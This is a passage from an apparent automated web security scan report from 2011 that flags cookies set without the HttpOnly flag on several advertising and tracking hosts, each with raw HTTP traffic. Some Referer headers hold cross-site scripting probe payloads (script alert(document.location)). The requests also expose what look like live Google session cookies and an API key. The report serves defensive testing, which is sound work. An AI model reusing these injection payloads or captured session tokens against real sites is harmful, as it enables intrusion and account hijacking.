bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#
fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; ih="b!!!!<!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!3e]N!!!!#=4X$w!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; vuday1=Ve/>1!4j#(Ncl]A; BX=ei08qcd75vc4d&b=3&s=8s&t=246; liday1=$4^M3!4j#(oZ>LE

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:03:53 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!%=4X0s!#eCK!!!!%=4X0s!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*
4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; path=/; expires=Wed, 11-Sep-2013 13:03:53 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 13:03:53 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

5.7. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

5.8. http://affiliates.lynda.com/42/510/50/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://affiliates.lynda.com
Path:   /42/510/50/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /42/510/50/ HTTP/1.1
Host: affiliates.lynda.com
Proxy-Connection: keep-alive
Referer: http://drupalsn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 12 Sep 2011 12:48:52 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_vtc=1c6d88f30e0ecdccd9fbf10eb320e373; expires=Wed, 12-Oct-2011 12:48:52 GMT; path=/
Location: http://files.lynda.com/files/lol_partners/art/lynda_bnr_180x150_growBrain.gif
X-Server-Name: www@dc1dtweb150
Content-Length: 0
Content-Type: image/gif


5.9. http://api.bizographics.com/v1/profile.redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=eff06988d5814684997ff16c58dc2e1c&callback_url=http%3A%2F%2Fdts1.raasnet.com%2Fdts%2Fbizo%2Fin HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33; BizoData=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

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Mon, 12 Sep 2011 13:06:08 GMT
Location: http://dts1.raasnet.com/dts/bizo/in?industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=aebbdc47-e882-4562-943a-4ec4a6e69e33;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXM6UUqwNaQIaj5XcunNcMDa7Re6IGD4lJwvYvTFPJeCAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRaQakHSuYMDekIwbdwzisbvEVUJBxdqAyBFiiNVUlT95AiiktrG07sTpWxGp85dzvukEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive


5.10. http://apis.google.com/js/plusone.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: PREF=ID=6140ef94871a2db0:U=9d75f5fa4bcb248c:TM=1310133151:LM=1312213620:S=1dVXBMrxVgTaM0LN; NID=50=RiW-T5rw6UNHE15U6e4ijurLlYQOhNAAx3AsgOlhf7JoXYr8k9p6zhr8BmRYYCm9S9iqhE9q7qPrM1SddgaXFMnn_WCOi1yRRQBODECSO7QxI_jJn0Wa1bbVacK0-r5F; SID=DQAAAO8AAAAdw-kaWu-Fwov6yR3LF5btMP1jnbGP3lA1M5cAk-0Wck2mlABMlKMllxla9PLwToQ6Dzrhz-v1Lq7PQ2o3ThUVIxuB7SVIVJjmSOGo3UpjxZ2Ms-siayi9e5mR3fQNgCwvNMI1ZR5pi86UDX3RjSEUkvGudz_HwxzWhdkifKTb2Pueggnt_R-Wq4cYX1myqtEWIr4ingATgva_JfCprkupgYOaut-TyOgZMu3abzangqdXu7C23wrZk52zsQqyvN8cgmKEcYqsYLb7POsFQ_k_vJG6IgdGLAd92mNx9HVO7YYTbQzVbwOwFdQcMZ4kaGg; HSID=ASQKbekgY7NOzCbjB; APISID=yDIrlyJyOEC5lWwI/AaFthBiKWYI1xFYHH

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAPAAAAAdw-kaWu-Fwov6yR3LF5btK5AujURQr0LqVUMcXQik6P2U8h2MgL7K9MSDbUmtoxEqp8R-f6pU-SsT11br3a9FnhX2eFff08QL9W0ouPV4plPpy3f_VrvMwgZHzwu85zF7sqZNbSGg7sRKNmT6yPKH3kPtig7Iy6CQiaPsydJqhrsiB5QTs8wGcyjHhwEWW4BTUduFIRuJ7pBxjA1po2g79YyD3bP4Iq_ErM9qCrYtTcmOMygzeC1hsDZ9Pk96-ZRbm1tScPztt3xwzNN0s3Igq2avUjsETlaJa18szgF8mqKHwpYSfqKay9y4ecWfVZk;Domain=.google.com;Path=/;Expires=Thu, 09-Sep-2021 13:04:27 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 12 Sep 2011 13:04:27 GMT
Date: Mon, 12 Sep 2011 13:04:27 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5398

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23579912-2b1b2e17';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

5.11. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=172392041&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.dome9.com%252F%26jsref%3D%26rnd%3D1315849265708&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.dome9.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.dome9.com%2F&jsref=&rnd=1315849265708
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 12 Sep 2011 12:40:56 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Wed, 11-Sep-2013 12:40:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


5.12. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

5.13. http://btg.mtvnservices.com/aria/guid.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://btg.mtvnservices.com
Path:   /aria/guid.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aria/guid.html HTTP/1.1
Host: btg.mtvnservices.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 466
Content-Type: text/javascript
Set-Cookie: aria_guid=1315831727-217; expires=Thu, 09 Sep 2021 12:48:47 GMT;path=/
ETag: "6fadfe0bc7ebeb328cca25f9535bd0f5:1296687166"
P3P: CP: IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT
Vary: Accept-Encoding
Cache-Control: max-age=4866
Date: Mon, 12 Sep 2011 12:48:47 GMT
Connection: close


                                   var guid_domain = location.hostname;
   var guid_domain_parts = guid_domain.split(".");
   if(guid_domain_parts.length>2)guid_domain = guid_domain_parts[guid_domain_parts.length-2]+"."+
...[SNIP]...

5.14. http://c.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=594085&resolution=1920&h=1200&camefrom=http%3A//drupal.org/cases&u=http%3A//www.popsugar.com/community/welcome&t=Welcome&java=1&security=defbf778&sc_random=0.8725620578043163&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323395.0-3907705.1315398865.0-6835990.1315398891.0-1212632.1315744722.0-594085.1315831680.0; expires=Sat, 10-Sep-2016 12:48:00 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

5.15. http://c13.statcounter.com/t.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c13.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

